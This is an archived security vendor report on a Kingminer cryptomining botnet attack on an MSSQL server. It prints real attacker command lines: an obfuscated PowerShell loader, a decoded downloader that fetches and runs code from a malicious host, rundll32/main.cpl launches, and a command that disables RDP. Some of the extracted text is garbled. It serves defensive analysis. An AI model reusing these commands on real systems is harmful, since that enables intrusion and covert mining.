{
	"id": "cbc2d23a-46fc-49e2-b8f8-8f328b7bdb89",
	"created_at": "2026-04-06T00:12:05.785916Z",
	"updated_at": "2026-04-10T03:22:13.08286Z",
	"deleted_at": null,
	"sha1_hash": "98475c80a5b362f192aa20d95a91ae36f7e5b1c6",
	"title": "Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 612463,
	"plain_text": "Uncovering a Kingminer Botnet Attack Using Trend Micro Managed\r\nXDR\r\nBy By: Buddy Tancio, Jed Valderama May 18, 2022 Read time: 4 min (1088 words)\r\nPublished: 2022-05-18 · Archived: 2026-04-02 10:46:20 UTC\r\nTrend Micro’s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our\r\nfindings and analysis in this report.\r\nWe observed malicious activities in a client’s SQL server that flagged a potential exploit in one public-facing device. A\r\nquick look at the Trend Micro Vision One™ Workbench showed that a Microsoft SQL server process created an obfuscated\r\nPowerShellnews- cybercrime-and-digital-threats command. This suggested that the machine had been compromised,\r\nprompting us to investigate further.\r\nThe tactics, techniques, and procedures (TTPs) discussed here reflect many of the TTPs that threat researchers have\r\nidentified with the Kingminer botnet. According to reportsopen on a new tab in mid-2020, malicious actors deployed\r\nKingminer to target SQL servers for cryptocurrency mining. Threat analysts have also documented known activitiesopen on\r\na new tab of the Kingminer botnet operators in November 2018 and their reemergenceopen on a new tab in July 2019. Our\r\nrecent detections therefore suggest the apparent resurgence of the malware that exploits systems with known, unpatched\r\nvulnerabilities. We discuss our findings in the following section.\r\nFigure 1. Trend Micro Vision One Workbench detection for the malicious SQL activity\r\nInvestigation and analysis\r\nWe observed a VBScriptopen on a new tab file named %PUBLIC%\\gfghhjhyuq.vbs executed through sqlservr.exeopen on a\r\nnew tab. This led us to suspect that the device had been exploited through a vulnerability that allowed malicious actors to\r\nexecute arbitrary codes remotely. The sqlservr process handles the requests received by an MSSQL database\r\nhttps://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\r\nPage 1 of 5\n\nFigure 2. Trend Micro Vision One™ execution profile of sqlservr.exe using PowerShell to run gfghhjhyuq.vbs\r\nWe collected the gfghhjhyuq.vbs file using Trend Micro Vision One to probe further. Despite the script being obfuscated, we\r\nwere able to uncover most of its functions by decoding the hex string parameters. We describe the chain of events in the\r\nfollowing section.\r\nThe file first checks for the operating system version through a WMIopen on a new tab object. It then proceeds to download\r\na 32-bit or 64-bit payload depending on the installed Windows version.\r\nFigure 3. Partially decoded gfghhjhyuq.vbs used to check the operating system version through a WMI object\r\nNext, it downloads a standalone PowerShell binary from a raw file stored in a GitHub user’s repository. Afterward, it saves\r\nand executes it as %PUBLIC%\\{timestamp}\\sysdo.exe.\r\nFigure 4. Downloading of 32-bit or 64-bit PowerShell binary from a GitHub repository\r\nhttps://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\r\nPage 2 of 5\n\nFigure 5. PowerShell binary copied as sysdo.exe and executed\r\nFollowing this, it generates the URL where additional PowerShell scripts will be downloaded. The scripts are then executed\r\nfilelessly using Invoke-Expressionopen on a new tab.\r\nFigure 6. Generating URLs for download and fileless execution of additional PowerShell scripts\r\nFinally, it runs a cryptocurrency miner payload through a Control Panel item.\r\nFigure 7. Execution of cryptocurrency miner through a Control Panel item\r\nSecurity teams can clearly see and monitor the chain of events in Vision One. After the cryptocurrency miner is executed\r\nthrough the Control Panel item, sqlservr.exe calls C:\\Windows\\Temp\\sysdo.exe (renamed as PowerShell binary).\r\nFigure 8. Sysdo.exe (renamed as a PowerShell binary) executing the following obfuscated commands directly\r\nto memory, detected as Trojan.PS1.MALXMR.PFAIS\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c\r\n\"$p='b3f8b7aab7d9f2e0bad8f5fdf2f4e3b7bad4f8fad8f5fdf2f4e3b7dae4effafba5b9cfdadbdfc3c3c7acb3f8b9d8e7f2f9bfb0d0d2c3b0bbb0ffe3e3e7adb8b8\r\n= for($i=0; $i -lt $p.length; $i+=2){[char](([byte][char][int]::Parse($p.substring($i,2),'HexNumber')) -bxor\r\n151)};$p=(-join $p) -join ' ';$p|\u0026(GAL I*X)\"\r\nUpon checking the Windows Antimalware Scan Interface (AMSI) telemetry through Vision One, we saw the decoded\r\nPowerShell command lines. These connect to http://ww[.]3113cfdae.com/eb[.]txt th\r\n$o = New-Object -ComObject Msxml2.XMLHTTP;$o.Open('GET','http://ww.3113cfdae.com/eb.txt',\r\n$False);$o.Send();$p\r\n=$o.responseText;[System.Text.Encoding]::Ascii.GetString([Convert]::FromBase64String($p))|\u0026(GAL I*X);nei \r\n-PEP\r\nath ffff -nic tk\r\nhttps://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\r\nPage 3 of 5\n\nSimilar to what we saw in our analysis of the file gfghhjhyuq.vbs script, it has also been observed through Vision One that\r\nsysdo.exe invoked rundll32open on a new tab using a main.cplopen on a new tab, which is a Microsoft Module for the\r\nfunctionality of the mouse. The malicious actor used this module to launch the payload directly onto the device’s memory\r\nthat connects to known malicious domain, http://qqqe[.]1eaba4fdae[.]com, to download additional components.\r\n\"C:\\Windows\\System32\\control.exe\" \"C:\\Windows\\system32\\main.cpl\" -QmDvMERT99\r\nhttp://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99\r\n\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\system32\\main.cpl\" -\r\nQmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99I*X)\"\r\nFigure 9. Process tree of Control Panel item execution as seen in the Vision One console\r\nWe noticed additional PowerShell executions spawned by sqlservr.exe. These were executed by the previously dropped\r\nsysdo.exe file. There are two commands here: One checks if the installed version of Windows is from Windows 2000 to\r\nWindows 7. Secondly, it checks separately if hotfixes KB4499175 (Windows 7 SP1) and KB4500331 (Windows XP,\r\nWindows Server 2003 SP2) are installed. If it finds that none of the hotfixes is present, this means that it is vulnerable to the\r\nBlueKeep vulnerability assigned as CVE-2019-0708open on a new tab. If both commands yield negative results, the script\r\ndisables RDP and the cryptocurrency miner proceeds to its infection routine.\r\n\"C:\\Windows\\system32\\cmd.exe\" /c cmd /c ver |findstr \"5.0 5.1 5.2 6.0 6.1\"\u0026\u0026wmic qfe GET hotfixid |findstr /i\r\n\"kb4499175 kb4500331\"||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call\r\nSetAllowTSConnections 0\r\n\"C:\\Windows\\System32\\cmd.exe\" /c ver |findstr \"5.0 5.1 5.2 6.0 6.1\"\u0026\u0026wmic qfe GET hotfixid |findstr /i\r\n\"kb4499175 kb4500331\"||wmic RDTOGGLE WHERE ServerName='HELPDESK' call SetAllowTSConnections 0\r\nDiscovering vulnerabilities\r\nUsing a search engine for internet of things (IoT) devices like Shodan and Censys, the team was able to both see exposed\r\nservices such as RDP and SQL and validate missing patches on any machine. One of the vulnerabilities we found traces\r\nback to 2014. \r\nFigure 10. Vulnerability found through a Shodan scan on any public-facing machine\r\nNotably, after we detected fgfghhjhyuq.vbs (detected as Trojan.VBS.MALXMR.AS), we continued to observe more\r\nattempts to drop malware on the same server. It’s important to note that although the malicious actor was unable to execute\r\nthe malware, such attempts did not stop since the vulnerability was still there. Only after the vulnerability was patched did\r\nthe attempts cease.\r\nhttps://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\r\nPage 4 of 5\n\nConclusion and security recommendations\r\nWhile measures for signature detection are in place to shield an organization’s network from breaches, security teams should\r\nstill prioritize the identification of vulnerabilities on their servers and endpoints and make sure that these are immediately\r\npatched. Doing so is even more crucial for public-facing systems. Adopting a proactive cybersecurity mindset is essential for\r\nan organization to thrive as the conduct of business in the digital space deepens and grows.\r\nIt is recommended that organizations deploy intrusion detection systems such as Trend Micro™ Deep Discovery™\r\nInspectoropen on a new tab as a preventive measure. This is relevant to the case discussed here. Since we did not have\r\nnetwork-level visibility, we only relied on endpoint-level data to investigate and respond to the threat. Implementing\r\nnetwork monitoring allows security professionals to detect specific server-related vulnerabilities that the malicious actors\r\nmight abuse, in addition to being able to scope out all affected machines on the network. A reliable intrusion detection\r\nsystem would also be a useful tool for monitoring and investigating ongoing attacks since it can provide historical logs of\r\nactivities in an organization’s network.\r\nIndicators of compromise (IOCs)\r\nSHA256 Detection Name\r\n0CF6882D750EEA945A9B239DFEAC39F65EFD91B3D0811159707F1CEC6CD80CC0 Trojan.VBS.MALXMR.AS\r\nCB29887A45AEA646D08FA16B67A24848D8811A5F2A18426C77BEAAE9A0B14B86 Trojan.PS1.MALXMR.PFAIS\r\n hxxp://ww.3113cfdae.com/eb[.]txt, detected as Dangerous (Disease Vector)\r\n hxxp://qqqe.1eaba4fdae[.]com/, detected as Dangerous (Disease Vector)\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\r\nhttps://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html"
	],
	"report_names": [
		"uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434325,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/98475c80a5b362f192aa20d95a91ae36f7e5b1c6.pdf",
		"text": "https://archive.orkl.eu/98475c80a5b362f192aa20d95a91ae36f7e5b1c6.txt",
		"img": "https://archive.orkl.eu/98475c80a5b362f192aa20d95a91ae36f7e5b1c6.jpg"
	}
}